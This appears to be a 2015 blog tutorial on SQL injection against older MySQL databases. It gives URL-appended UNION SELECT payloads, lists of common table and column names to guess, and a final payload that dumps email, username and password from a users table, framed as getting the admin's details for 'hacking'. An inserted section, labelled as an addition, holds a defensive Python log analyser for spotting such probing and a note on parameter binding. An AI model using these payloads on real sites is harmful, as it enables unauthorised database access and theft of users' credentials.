Sunday 16 August 2015

SQL Injection - Tutorial - Database Version 4 and Below

As pointed out before, if your database is version 4 or lower, you have a little problem: it will be harder to get the tables.

Add the following at the end of the url :

+UNION+SELECT+1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema),3 from information_schema.columns where column_name like CHAR(37, 112, 97, 115,37)--

NOTE: If you have 5 available columns, you will have to change the column list to match, and so on.

Now if you get no error and you see the tables, you are fine. If not, you are out of luck and will probably have to guess the tables :(

Here are some known table names :

tbl_user, tbl_admin, tbl_access, user, users,
member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins

Now just add the following at the end of the url :

+UNION+SELECT+1,2,3 from TABLE NAME HERE

So now I will guess the table name admin on my test url :

www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from admin

Now just keep guessing until you find a table name that works ;)

Now let's say the following table worked :

www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from users

Now we will have to guess the columns ;)

Common column names are:

first_name, last_name, email, username,
password, pass, user_id, user_pass

Now we will test the column name user_pass. Type in the following at the end of the url :

+UNION+SELECT+1,user_pass,3 from users

So it should look like this :

www.testwebsite.com/index.php/id=234+UNION+SELECT+1,user_pass,3 from users

Now just keep guessing until one of the columns works. :D

Now, for example, to get the user name, password and email, type in the following at the end of the url :

+UNION+SELECT+1,concat(email,0x3a,username,0x3a,password),3 from users

So this will give us the information of the admin :)
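
Seen from the server side, the table and column guessing described above leaves a recognisable trail in the web access log: one client repeating UNION SELECT against a series of different FROM targets. The following added example (not part of the original tutorial) shows that detection in Python; the log format, the sample lines, the `analyse` helper and the threshold of three tables are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (client, request line); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 "GET /index.php/id=234 HTTP/1.1"',
    '203.0.113.7 "GET /index.php/id=234+UNION+SELECT+1,2,3+from+admin HTTP/1.1"',
    '203.0.113.7 "GET /index.php/id=234+UNION+SELECT+1,2,3%20from%20tbl_user HTTP/1.1"',
    '203.0.113.7 "GET /index.php/id=234+union+select+1,2,3+from+users HTTP/1.1"',
    '203.0.113.7 "GET /index.php/id=234+UNION+SELECT+1,user_pass,3+from+users HTTP/1.1"',
    '192.0.2.9 "GET /index.php/id=234+UNION+SELECT+1,2,3+from+information_schema.columns HTTP/1.1"',
    '198.51.100.4 "GET /news.php?title=trade+union+select+committee HTTP/1.1"',
]

LINE_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+"$')
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b(.*)", re.I | re.S)
FROM_RE = re.compile(r"\bfrom\s+([\w.]+)", re.I)

def analyse(lines, guess_threshold=3):
    """Summarise UNION SELECT probes per client (hypothetical helper)."""
    seen = defaultdict(lambda: {"requests": 0, "tables": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # Decode '+' and %xx first so every spelling of a space is normalised.
        u = UNION_RE.search(unquote_plus(target))
        if not u:
            continue
        tail = u.group(1)
        table = FROM_RE.search(tail)
        # Need a column list or FROM, so prose like "trade union select" is ignored.
        if "," not in tail and not table:
            continue
        seen[client]["requests"] += 1
        if table:
            seen[client]["tables"].add(table.group(1).lower())
    report = {}
    for client, e in seen.items():
        tables = sorted(e["tables"])
        report[client] = {
            "requests": e["requests"],
            "tables": tables,
            "schema_dump": any(t.startswith("information_schema.") for t in tables),
            "table_guessing": len(tables) >= guess_threshold,
        }
    return report
```

Detection only tells you the probing happened. The fix in the application is to bind `id` as a query parameter (or cast it to an integer) so that text appended to the URL never reaches the SQL parser.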

So this was the tutorial. Hope you enjoyed it ;)

Thank you.
Happy Hacking/Penetration testing :)
